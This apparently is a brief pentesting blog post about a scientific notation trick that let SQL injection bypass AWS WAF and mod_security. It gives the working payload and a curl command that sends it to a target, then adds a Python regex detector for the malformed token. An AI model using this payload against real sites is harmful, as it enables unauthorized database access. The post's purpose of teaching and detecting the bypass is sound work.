Learn Pentesting like a Pro!

Scientific Notation bug bypass AWS WAF protection

pentesting.academy

Oct 29, 2021

AWS WAF and the mod_security Apache module were affected by a scientific notation bug, discovered back in 2013, that allowed an attacker to bypass the WAF and successfully exploit a SQL injection vulnerability.

The payload used for the attack, showing the scientific notation, is below:

"x=1' or 1.e(1) or '1'='1"

By executing the following command, it was possible to bypass the WAF's SQL injection protection and exploit a SQL injection in the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"
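
For detection, one way to flag the malformed exponent token seen in the payload above when reviewing logged form bodies. This is an added example, not code from the original post; the regex, the `scan_form_body` name and every sample body other than the post's payload are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Digits, optional fraction, then an exponent marker "e" that is NOT followed
# by exponent digits, e.g. "1.e(". Complete literals such as "1.5e10" or "2e-3"
# do not match. The lookbehind skips digits inside identifiers or hex strings.
INCOMPLETE_EXPONENT = re.compile(
    r"(?<![\w.])\d+(?:\.\d*)?e(?![+-]?\d|\w)", re.IGNORECASE
)


def scan_form_body(body):
    """Return (parameter, token) pairs for each incomplete exponent token
    found in an application/x-www-form-urlencoded body (decoded once)."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for match in INCOMPLETE_EXPONENT.finditer(value):
            hits.append((name, match.group(0)))
    return hits


# The first body is the payload from the post; the rest are constructed samples.
SAMPLES = [
    "x=1' or 1.e(1) or '1'='1",
    "x=1%27+or+1.e%281%29+or+%271%27%3D%271",   # same payload, URL-encoded
    "price=1.5e10&qty=2e-3",                    # well-formed scientific notation
    "id=550e8400-e29b-41d4-a716-446655440000",  # UUID containing "e" after digits
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_form_body(body) or "clean", "<-", body)
```

This is a heuristic for log review and alerting that complements, rather than replaces, parameterized queries in the application.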

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/
